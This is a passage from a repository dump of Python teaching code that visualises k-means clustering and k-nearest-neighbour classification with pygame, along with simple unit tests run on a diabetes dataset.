pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_c:\n k_mean_started = False\n stable = False\n kmean_storage.clear()\n if event.key == pygame.K_1:\n kmean_storage.add_data_point(pos)\n break\n if event.key == pygame.K_2:\n kmean_storage.add_centroid(pos)\n break\n if event.key == pygame.K_s:\n if kmean_storage.can_be_started():\n k_mean_started = True\n break\n\n screen.fill(BLACK)\n\n if k_mean_started:\n if kmeans_state == 0:\n # Assign and draw\n assignments = kmean_storage.kMeans_assignment()\n centroids = kmean_storage.get_centroids()\n\n for key in assignments:\n lst_pnts = assignments[key]\n centroid_coords = centroids[key]\n for point in lst_pnts:\n pygame.draw.line(screen, colour_by_class[key], point, centroid_coords, 1)\n kmeans_state = 1\n\n elif kmeans_state == 1:\n # Move\n assignments = kmean_storage.kMeans_assignment()\n new_centers = {k: mean(v) for k, v in assignments.items()}\n stable = kmean_storage.set_new_centers(new_centers)\n kmeans_state = 0\n\n time.sleep(1)\n\n if stable:\n text = font.render(str(\"Stable\"), True, WHITE)\n screen.blit(text, (700,10))\n\n data_pnts = kmean_storage.get_data()\n for pnt in data_pnts:\n pygame.draw.circle(screen, WHITE, pnt, 2)\n\n cluster_centroids = kmean_storage.get_centroids()\n for pnt in cluster_centroids:\n k, v = pnt, cluster_centroids[pnt]\n pygame.draw.circle(screen, colour_by_class[k], v, 4)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.4912863075733185, "alphanum_fraction": 0.5244813561439514, "avg_line_length": 31.486486434936523, "blob_id": "3f4feb08b81550dc0db1be8af23e9d90b2a0d63a", "content_id": "4b69a029e08a7f4f52ef8a886efb91fa6dc1e9a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 94, "num_lines": 37, "path": "/algorithms/KNearestNeighbourTest.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\n\nfrom algorithms.KNearestNeighbour import KNN\n\n\nclass TestKNN(unittest.TestCase):\n\n def test_basic_behaviour(self):\n with open(\"../data_sets/pima-indians-diabetes.data\", 'r') as f:\n data = f.read()\n data = data.split(\"\\n\")\n data = [d.split(\",\") for d in data[0:len(data)-1]]\n data = [[float(p) for p in d] for d in data]\n\n random.shuffle(data)\n train, test = data[:int(len(data)*0.67)], data[int(len(data)*0.67):]\n\n pnts_label_0 = [p[0:len(p)-1] for p in train if int(p[-1]) == 0]\n pnts_label_1 = [p[0:len(p)-1] for p in train if int(p[-1]) == 1]\n\n knn = KNN(2)\n\n [knn.add_data_point(1, p) for p in pnts_label_0]\n [knn.add_data_point(2, p) for p in pnts_label_1]\n\n\n for k in [1, 3, 5, 7, 9, 11, 13, 15]:\n success = 0\n for data_element in test:\n pnt, label = data_element[0: len(data_element)-1], data_element[-1]\n label += 1\n\n if int(label) == knn.estimate(k, pnt):\n success += 1\n\n print \"Result for k={}:\".format(k), success, len(test), success / float(len(test))\n\n\n\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 23, "blob_id": "f704c95105346a989cb75de6d2bcdba0b8be7b94", "content_id": "65e63c37edd72ac79eff035e18612b44300b9063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": 
"/algorithms/__init__.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "__author__ = 'rkessler'\n" }, { "alpha_fraction": 0.5087273716926575, "alphanum_fraction": 0.5369724035263062, "avg_line_length": 26.8938045501709, "blob_id": "cbe896ad653d7fefc20db0fd1152385a7ba404d5", "content_id": "887cd07d6471b2d0b31454f7c1fe0355a153f26b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 82, "num_lines": 113, "path": "/interactiveKNearestNeighbour.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nfrom algorithms.KNearestNeighbour import KNN\n\n#defining color variables\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0,255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 1: RED,\n 2: GREEN,\n 3: BLUE,\n 4: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"K-Nearest-Neighbour\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\nknn_storage = KNN(4)\ncurrent_k = 1\ndraw_area = False\ndraw_lines = False\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_0:\n knn_storage.clear()\n if event.key == pygame.K_1:\n knn_storage.add_data_point(1, pos)\n break\n if event.key == pygame.K_2:\n knn_storage.add_data_point(2, pos)\n break\n if event.key == pygame.K_3:\n knn_storage.add_data_point(3, pos)\n break\n if event.key == pygame.K_4:\n knn_storage.add_data_point(4, pos)\n break\n if event.key == pygame.K_PLUS:\n current_k += 1\n break\n if event.key == pygame.K_MINUS:\n current_k -= 1\n current_k = max(1, current_k)\n break\n if event.key == pygame.K_a:\n draw_area = not draw_area\n break\n if event.key == pygame.K_l:\n draw_lines = not draw_lines\n break\n\n screen.fill(BLACK)\n\n if draw_area:\n for i in range(0, size[0], 20):\n for j in range(0, size[0], 20):\n x,y = i+10, j+10\n result = knn_storage.estimate(current_k, (i, j))\n\n if result is not None and not math.isnan(result):\n pygame.draw.circle(screen, colour_by_class[result], (i, j), 1)\n\n\n data_points = knn_storage.get_data_points()\n # First draw all points on screen\n for pnt in data_points:\n pygame.draw.circle(screen, colour_by_class[pnt[1]], pnt[0], 5)\n\n # Draw the current k\n text = font.render(str(\"Curent K: \" + str(current_k)), True, WHITE)\n screen.blit(text, (10,10))\n\n text = font.render(str(\"FPS: \" + str(int(clock.get_fps()))), True, WHITE)\n screen.blit(text, (700,10))\n\n if draw_lines:\n # Estimate the mouse cursors colour\n result = knn_storage.estimate_and_get_nearest(current_k, pos)\n\n if result is not None:\n m_label, pnts = result\n\n if not math.isnan(m_label):\n for element in pnts:\n dst, label, tpos = element\n pygame.draw.line(screen, colour_by_class[label], pos, tpos, 2)\n\n pygame.draw.circle(screen, colour_by_class[m_label], pos, 8)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.5631793737411499, "alphanum_fraction": 0.5754076242446899, "avg_line_length": 26.79245376586914, "blob_id": "f7ba57dee4c4c993feb464421f2bb2b67d2a0cd8", "content_id": "1a12c43d816b105a0b18158d3d29c66a5bd50030", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1472, "license_type": "no_license", "max_line_length": 112, "num_lines": 53, "path": "/algorithms/KMeans.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import math\n\n\nclass KMeans():\n\n def __init__(self):\n self.centroids = {}\n self.data_points = []\n\n def clear(self):\n self.centroids = {}\n self.data_points = []\n\n def add_data_point(self, pnt):\n self.data_points.append(pnt)\n\n def add_centroid(self, pnt):\n if 0 <= len(self.centroids) < 4:\n self.centroids[len(self.centroids)] = pnt\n\n def get_data(self):\n return self.data_points\n\n def get_centroids(self):\n return self.centroids\n\n def set_new_centers(self, new_centroids):\n if str(new_centroids) == str(self.centroids):\n return True\n else:\n self.centroids = new_centroids\n return False\n\n def kMeans_assignment(self):\n assignments = {}\n for pnt in self.data_points:\n distances = [(self.calculate_euclidean_distance(pnt, self.centroids[k]), k) for k in self.centroids]\n distances = sorted(distances, key=lambda x: x[0])\n assignment = distances[:1][0]\n\n if assignment[1] not in assignments:\n assignments[assignment[1]] = []\n\n assignments[assignment[1]].append(pnt)\n\n return assignments\n\n def calculate_euclidean_distance(self, e1, e2):\n assert len(e1) == len(e2)\n return math.sqrt(sum([(e1[i] - e2[i])**2 for i in range(len(e1))]))\n\n def can_be_started(self):\n return len(self.centroids) > 0 and len(self.data_points) > 0" }, { "alpha_fraction": 0.5450398921966553, "alphanum_fraction": 0.5610034465789795, "avg_line_length": 29.241378784179688, "blob_id": "5948ac491cf4f1b3cf6338d60f08e3e9d4bd001d", "content_id": "135a5bb4f78c6b5ed546aaaeaab4a5266e8c46fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 877, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/algorithms/NaiveBayesTest.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\nfrom algorithms.NaiveBayes import NaiveBayes\n\n\nclass TestNaiveBayes(unittest.TestCase):\n\n def test_with_data_set(self):\n with open(\"../data_sets/pima-indians-diabetes.data\", 'r') as f:\n data = f.read()\n data = data.split(\"\\n\")\n data = [d.split(\",\") for d in data[0:len(data)-1]]\n data = [[float(p) for p in d] for d in data]\n\n random.shuffle(data)\n train, test = data[:int(len(data)*0.67)], data[int(len(data)*0.67):]\n\n nb = NaiveBayes()\n for element in train:\n nb.add_data_point(element[-1], element[0:len(element)-1])\n nb.build_model()\n\n success = 0\n\n for element in test:\n if int(element[-1]) == nb.predict(element):\n success += 1\n\n print \"Result:\", success, len(test), success / float(len(test))\n" } ]
10
mohammedrahamadulla/python-programs
https://github.com/mohammedrahamadulla/python-programs
2ff4b1971d9d99c7c49c5e98e4ac7452c548d1c7
5c68a6d6a6af9c29489c63e862bdfbb6cb3eaba0
b2e1d8ff1195bb8afd1304b97c8b825455e83689
refs/heads/master
2021-08-24T06:31:07.517331
2017-12-08T12:19:20
2017-12-08T12:19:20
113,567,460
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7013274431228638, "alphanum_fraction": 0.7168141603469849, "avg_line_length": 31.285715103149414, "blob_id": "5d8b72d2630ac276f25177788ac2f17a7a9177e9", "content_id": "8ad883ecd4de8f452ca350a9eaed49ce80af4492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 60, "num_lines": 14, "path": "/frstprgm.py", "repo_name": "mohammedrahamadulla/python-programs", "src_encoding": "UTF-8", "text": "def apply_discount(amount):\n discount = 10\n final_amount = amount - (amount*discount)/100\n return final_amount\n\n#To take input from users\nno_of_prods = int(input(\"Enter the number of products: \"))\n\nbill_amount = (no_of_prods)*30\nprint(\"Your bill before discount - \",bill_amount)\n\nfinal_bill_amount = apply_discount(bill_amount)\nprint(\"Your Final bill after discount - \",final_bill_amount)\nprint(\"you saved - \",bill_amount - final_bill_amount)\n" } ]
1
Seeethy/Hamming-7-4
https://github.com/Seeethy/Hamming-7-4
42900d7b7d4b335eeca368d7a270e9b81b8b9884
79c382d4f7eb211fd77ea4a0ea37d42d174fe169
1f72183f97d97064d8fc42f9f660ae59a46e1c16
refs/heads/main
2023-03-09T01:08:07.101755
2021-03-01T10:23:42
2021-03-01T10:23:42
343,373,927
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7262773513793945, "alphanum_fraction": 0.7408758997917175, "avg_line_length": 44.66666793823242, "blob_id": "ea9073d2c930c29b508844672a105c8dfe707487", "content_id": "c6c08514c6175b8f05b21a1cca617cc80e0caf60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/README.md", "repo_name": "Seeethy/Hamming-7-4", "src_encoding": "UTF-8", "text": "# Hamming-7-4-\n\n## Setup\nCode of the project is stored in **Hamming(7,4).py** file.<br /><br />\nOpen .py file in any environment used in computer programming which allows you to program in python.\nYou will need to install or input two python libraries: math and matplotlib.\n" }, { "alpha_fraction": 0.48057883977890015, "alphanum_fraction": 0.5571210980415344, "avg_line_length": 25.914894104003906, "blob_id": "73e728da662afeb4cfa23db3899d5df416b10a8e", "content_id": "a2fad3ecb7fed6ca7050bdf80d228d280a67bef3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2640, "license_type": "no_license", "max_line_length": 106, "num_lines": 94, "path": "/Hamming(7,4).py", "repo_name": "Seeethy/Hamming-7-4", "src_encoding": "WINDOWS-1250", "text": "\"\"\"\r\n1)Bity na wejściu dla stringa \"Adam\"\r\n0,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,1,1,0,1,1,0,1\r\n2)W przykładzie przekłamuje pierwszy bit w pierwszej tablicy ktora wychodzi z outputu funkcji Hamming 7.4:\r\n1,0,0,1,1,0,0 ----> 0,0,0,1,1,0,0\r\n3) Output demodulacji:\r\nRozpoznanie przeklamanego bitu ( pozycja 1)\r\nBity na wyjściu:\r\n0,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,1,1,0,1,1,0,1\r\n\"\"\"\r\n# funkcia S2BS uproszczona dla tej laborki\r\ndef S2BS( napis ):\r\n b = [bin(ord(x))[2:].zfill(8) for x in napis]\r\n global zwracana_wartosc\r\n for x in b:\r\n zwracana_wartosc = \"\".join(b)\r\n return (zwracana_wartosc)\r\n\r\nnapiss = input(\"Podaj napis: \")\r\nS2BS(napiss)\r\n\r\n# zad1 - funkcja hamminga\r\n\r\nX = []\r\n\r\nfor i in range(len(zwracana_wartosc)):\r\n if zwracana_wartosc[i] =='1':\r\n X.append(1)\r\n if zwracana_wartosc[i] =='0':\r\n X.append(0)\r\n\r\n#X = Array(X)\r\nprint(\"Bity na wejściu: \")\r\nprint(\"\",X)\r\n\r\nimport numpy as np\r\n\r\ndef Hamming74():\r\n G = np.array([(1,1,0,1), (1,0,1,1),(1,0,0,0),(0,1,1,1),(0,1,0,0),(0,0,1,0),(0,0,0,1)])\r\n \r\n pakiet = np.zeros( (int(len(X)/4), 4) )\r\n global h\r\n h = []\r\n \r\n for i in range(0,len(pakiet),1): \r\n for j in range(0,4,1): \r\n pakiet[i][j] = X[j+4*i]\r\n hh = np.array(G.dot(pakiet[i])%2,dtype = np.uint64)\r\n h.append(hh)\r\n return h\r\n\r\nh = Hamming74()\r\n#print(h[0])\r\nprint(\"Przed przekłamaniem: \")\r\nprint(\"\",h[0])\r\ndef negacja(Xx,w1,w2):\r\n if Xx[w1][w2] == 0:\r\n Xx[w1][w2] = 1\r\n else:\r\n Xx[w1][w2] = 0\r\n return Xx\r\n\r\nnegacja(h,0,0)\r\nprint(\"Przykładowo przekłamuje 1 bit w 1 czesci:\")\r\nprint(\"Po przekłamaniu: \\n\",h[0])\r\nprint(\"Za pomocą demodulacji odnajduje pozycję przekłamanego bitu i zwracam to co w inpucie: \")\r\ndef demodulacja74():\r\n wektor_wyjsciowy = []\r\n for i in range(0,len(h),1): # długosc h (ilosc tablic)\r\n p1 = (h[i][0] + h[i][2] + h[i][4] + h[i][6]) % 2 \r\n p2 = (h[i][1] + h[i][2] + h[i][5] + h[i][6]) % 2\r\n p3 = (h[i][3] + h[i][4] + h[i][5] + h[i][6]) % 2\r\n n = p1 *2**0 + p2*2**1 + p3*2**2\r\n n = int(n)\r\n if n == 0:\r\n wektor_wyjsciowy.append(int(h[i][2]))\r\n wektor_wyjsciowy.append(int(h[i][4]))\r\n 
wektor_wyjsciowy.append(int(h[i][5]))\r\n wektor_wyjsciowy.append(int(h[i][6]))\r\n if n > 0:\r\n if h[i][n] == 1:\r\n h[i][n] = 0\r\n else:\r\n h[i][n] = 1\r\n print(\"Blad na indeksie: \", n)\r\n wektor_wyjsciowy.append(int(h[i][2]))\r\n wektor_wyjsciowy.append(int(h[i][4]))\r\n wektor_wyjsciowy.append(int(h[i][5]))\r\n wektor_wyjsciowy.append(int(h[i][6]))\r\n return wektor_wyjsciowy\r\n\r\ntest = demodulacja74()\r\nprint(\"Bity na wyjściu: \")\r\nprint(\"\",test)\r\n\r\n" } ]
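The encode and syndrome arithmetic of the script above, as a compact self-contained C++ sketch (same bit layout: parity bits at 1-based codeword positions 1, 2 and 4; all names and the example data word are illustrative, not part of the repository):

```cpp
#include <array>
#include <cstdio>

// Encode 4 data bits into the layout used above: c = [p1, p2, d1, p3, d2, d3, d4].
std::array<int, 7> encode(const std::array<int, 4>& d) {
    std::array<int, 7> c{};
    c[2] = d[0]; c[4] = d[1]; c[5] = d[2]; c[6] = d[3];
    c[0] = (d[0] + d[1] + d[3]) % 2; // p1
    c[1] = (d[0] + d[2] + d[3]) % 2; // p2
    c[3] = (d[1] + d[2] + d[3]) % 2; // p3
    return c;
}

// Returns the 1-based position of a single-bit error, or 0 if the word is clean.
int syndrome(const std::array<int, 7>& c) {
    int p1 = (c[0] + c[2] + c[4] + c[6]) % 2;
    int p2 = (c[1] + c[2] + c[5] + c[6]) % 2;
    int p3 = (c[3] + c[4] + c[5] + c[6]) % 2;
    return p1 + 2 * p2 + 4 * p3;
}

int main() {
    std::array<int, 7> c = encode({1, 0, 0, 1});
    c[0] ^= 1;                                 // corrupt codeword position 1
    int pos = syndrome(c);
    if (pos > 0) c[pos - 1] ^= 1;              // flip the bit at 0-based index pos - 1 back
    std::printf("error position: %d\n", pos);  // prints 1
    return 0;
}
```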
2
MarkusFischer/hpc-class
https://github.com/MarkusFischer/hpc-class
528d61c388ab17d2cd9f6c0e4bb5615e9930f2bb
af36df155318fe8b4d822c337b43c7f9c05d9a42
71929c740838f708e2e44db2d3278a6319e67d28
refs/heads/main
2023-06-11T18:56:14.907381
2021-06-26T12:15:19
2021-06-26T12:15:19
358,349,225
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.36796537041664124, "alphanum_fraction": 0.3782467544078827, "avg_line_length": 20, "blob_id": "3a9cfd501f4cef0eeba46545d4aa7ac1b366e2c0", "content_id": "42f50798bb6f9fae6f6127939e7c2a0ddc29819a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 79, "num_lines": 88, "path": "/exercise_4/src/util.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cmath>\n#include <random>\n#include <iostream>\n\n#include \"util.hpp\"\n\nbool compare_matrices(float const* i_a,\n float const* i_b,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_lda,\n unsigned int i_ldb,\n float eps,\n\t\t bool verbose)\n{\n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n if (std::abs(i_a[(n * i_lda) + m] - i_b[(n * i_ldb) + m]) > eps)\n\t {\n\t\t if (verbose)\n\t\t {\n\t\t std::cerr << \"Missmatch at m: \" << m << \" n: \" << n << std::endl;\n\t\t }\n return false;\n }\n }\n }\n return true;\n}\n\n\nfloat* random_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld)\n{\n if (i_ld < i_m)\n {\n return nullptr;\n }\n \n std::random_device rd;\n \n std::mt19937 e2(rd());\n std::uniform_real_distribution<> dist(0, 1);\n \n float* matrix = new float[i_n * i_ld];\n \n for (size_t m = 0; m < i_ld; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = 0;\n }\n }\n \n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = dist(e2);\n }\n }\n return matrix;\n}\n\n\nfloat* zero_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld)\n{\n if (i_ld < i_m)\n {\n return nullptr;\n }\n \n float* matrix = new float[i_n * i_ld];\n \n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = 0;\n }\n }\n return matrix;\n}\n" }, { "alpha_fraction": 0.7531914710998535, "alphanum_fraction": 0.7702127695083618, "avg_line_length": 28.375, "blob_id": "994be855901d0fbfa2d98e05f6e8f4790e9e767e", "content_id": "fb4b13e9d2c3d237b59094a573d98fda9ce86b41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 235, "license_type": "no_license", "max_line_length": 84, "num_lines": 8, "path": "/README.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# hpc-class\nsolutions for high performance computing class at fsu jena in summer 2021\n\nclass url: https://scalable.uni-jena.de/opt/hpc/\n\n# compiling\n\nif not stated otherwise: use g++ -o exercisei exercise_i/exercise.cpp for exercise i\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.418120801448822, "avg_line_length": 28.81999969482422, "blob_id": "ce38640e1b34fe7ef1b3a6cb4b3916b8f4e3bc4c", "content_id": "94a222474253bbd54253ab836e479f04d329a1f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/exercise_9/mini_jit_base/src/generators/MyExample.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"MyExample.h\"\n\nuint32_t ( *mini_jit::generators::MyExample::generate(uint32_t i_fac) )() {\n uint32_t l_ins = 0;\n\n // init output\n l_ins = instructions::Base::dpMovImm( 0,\n 1,\n 1 );\n m_kernel.addInstruction( l_ins );\n\n l_ins = instructions::Base::dpMovImm( 1,\n i_fac,\n 1 );\n 
m_kernel.addInstruction( l_ins );\n\n m_kernel.resetOffset();\n\n //multiply\n l_ins = instructions::Base::dpMulReg( 0, \n 1,\n 0, \n 1 );\n m_kernel.addInstruction( l_ins );\n\n // decrease loop-counter\n l_ins = instructions::Base::dpSubImm( 1,\n 1,\n 1,\n 1 );\n m_kernel.addInstruction( l_ins );\n\n int32_t l_jumpPc = -m_kernel.getOffset() / 4;\n l_ins = instructions::Base::bCbnz( 1,\n l_jumpPc,\n 1 );\n m_kernel.addInstruction( l_ins ); \n \n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n // we might debug through file-io\n std::string l_file = \"myexample.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.39638009667396545, "alphanum_fraction": 0.4280543029308319, "avg_line_length": 18.05172348022461, "blob_id": "43ad125c3a79e8f05f915843ee7396702c9d5946", "content_id": "dd8544c629cce2252104e5e9c5365d71abe4a691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 99, "num_lines": 58, "path": "/exercise_5/task3/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <cstdlib>\n#include <iostream>\n\nextern \"C\" {\n void copy_asm( uint32_t const * i_a,\n uint64_t * o_b );\n void copy_c( uint32_t const * i_a,\n uint64_t * o_b );\n}\n\nbool check_and_reset(uint32_t const * i_a, uint64_t* io_b)\n{\n bool same = true;\n for (int i = 0; i < 7; ++i)\n {\n\t//std::cout << \"i_a[\" << i << \"] : \" << i_a[i] << \" io_b[\" << i << \"] : \" << io_b[i] << std::endl;\n if (i_a[i] != io_b[i])\n {\n same = false;\n }\n io_b[i] = 0;\n }\n return same;\n}\n\nint main() {\n uint32_t l_a[7] = { 1, 21, 43, 78, 89, 91, 93 };\n uint64_t l_b[7] = { 0 };\n\n copy_asm( l_a,\n l_b );\n \n std::cout << \"copy_asm \";\n if (check_and_reset(l_a, l_b))\n {\n std::cout << \"succeed\" << std::endl;\n }\n else\n {\n std::cout << \"failed\" << std::endl;\n }\n\n copy_c( l_a,\n l_b );\n\n std::cout << \"copy_c \";\n if (check_and_reset(l_a, l_b))\n {\n std::cout << \"succeed\" << std::endl;\n }\n else\n {\n std::cout << \"failed\" << std::endl;\n }\n \n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.45205479860305786, "alphanum_fraction": 0.49098774790763855, "avg_line_length": 27.91666603088379, "blob_id": "7044cff658f1312d6de8453bf802cd6872509630", "content_id": "86d8d08b728c3f67feb316cfe5605edb29e595d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1387, "license_type": "no_license", "max_line_length": 132, "num_lines": 48, "path": "/exercise_8/driver_sve2.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\" \n{\n void fmlalb_example(float* const a, float* const b, float* c);\n void fmlalt_example(float* const a, float* const b, float* c); \n void udot_example(float* const a, float* const b, float* c);\n}\n\n\nint main()\n{\n float dataIn1[128] = {0};\n float dataIn2[128] = {0};\n float dataOut[128] = {0};\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n dataIn1[i] = (i + 1) * 2;\n dataIn2[i] = (i + 1) * 3;\n }\n\n std::cout << \"fmlalb kernel\" << std::endl;\n fmlalb_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << 
std::endl;\n }\n\n\n std::cout << std::endl << std::endl << \"fmlalt kernel\" << std::endl;\n fmlalt_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << std::endl;\n }\n\n std::cout << std::endl << std::endl << \"udot kernel\" << std::endl;\n udot_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << std::endl;\n }\n}" }, { "alpha_fraction": 0.6689250469207764, "alphanum_fraction": 0.6689250469207764, "avg_line_length": 66.09091186523438, "blob_id": "4d2740e5b599cc1e8bb583fa3886278334a5fe9e", "content_id": "64f78ff3b2d4e2ef5dd86bd64d6fddf5cedb2700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2214, "license_type": "no_license", "max_line_length": 191, "num_lines": 33, "path": "/exercise_9/mini_jit_base/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\nOPTIONS = -pedantic -Wall -Wextra -Werror\n\nmini_jit: src/driver.cpp src/instructions/Base.cpp src/instructions/Asimd.cpp src/backend/Kernel.cpp src/generators/Simple.cpp src/generators/Loop.cpp src/generators/MyExample.cpp\n\t\tg++ ${OPTIONS} -c src/instructions/Base.cpp -o ${BUILD_DIR}/instructions/Base.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.cpp -o ${BUILD_DIR}/instructions/Asimd.o\n\t\tg++ ${OPTIONS} -c src/backend/Kernel.cpp -o ${BUILD_DIR}/backend/Kernel.o\n\t\tg++ ${OPTIONS} -c src/generators/Simple.cpp -o ${BUILD_DIR}/generators/Simple.o\n\t\tg++ ${OPTIONS} -c src/generators/Loop.cpp -o ${BUILD_DIR}/generators/Loop.o\n\t\tg++ ${OPTIONS} -c src/generators/MyExample.cpp -o ${BUILD_DIR}/generators/MyExample.o\n\n\t\tg++ ${OPTIONS} src/driver.cpp ${BUILD_DIR}/instructions/Base.o ${BUILD_DIR}/instructions/Asimd.o \\\n\t\t ${BUILD_DIR}/backend/Kernel.o \\\n\t\t ${BUILD_DIR}/generators/Simple.o ${BUILD_DIR}/generators/Loop.o \\\n\t\t\t\t\t ${BUILD_DIR}/generators/MyExample.o \\\n\t\t -o ${BUILD_DIR}/mini_jit\n\ntest: src/test.cpp src/driver.cpp src/instructions/Base.cpp src/instructions/Asimd.cpp src/backend/Kernel.cpp src/generators/Simple.cpp src/generators/Loop.cpp src/instructions/Asimd.test.cpp\n\t\tg++ ${OPTIONS} -c src/instructions/Base.cpp -o ${BUILD_DIR}/instructions/Base.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.cpp -o ${BUILD_DIR}/instructions/Asimd.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.test.cpp -o ${BUILD_DIR}/instructions/Asimd.test.o\n\t\tg++ ${OPTIONS} -c src/backend/Kernel.cpp -o ${BUILD_DIR}/backend/Kernel.o\n\t\tg++ ${OPTIONS} -c src/generators/Simple.cpp -o ${BUILD_DIR}/generators/Simple.o\n\t\tg++ ${OPTIONS} -c src/generators/Loop.cpp -o ${BUILD_DIR}/generators/Loop.o\n\n\t\tg++ ${OPTIONS} src/test.cpp ${BUILD_DIR}/instructions/Base.o \\\n\t\t ${BUILD_DIR}/instructions/Asimd.o ${BUILD_DIR}/instructions/Asimd.test.o \\\n\t\t ${BUILD_DIR}/backend/Kernel.o \\\n\t\t ${BUILD_DIR}/generators/Simple.o ${BUILD_DIR}/generators/Loop.o \\\n\t\t -o ${BUILD_DIR}/test\n$(shell mkdir -p build/backend)\n$(shell mkdir -p build/instructions)\n$(shell mkdir -p build/generators)\n" }, { "alpha_fraction": 0.5521162152290344, "alphanum_fraction": 0.559065043926239, "avg_line_length": 34.977272033691406, "blob_id": "6f064b41c794e2b6e1e029c4468d9446451e0e67", "content_id": 
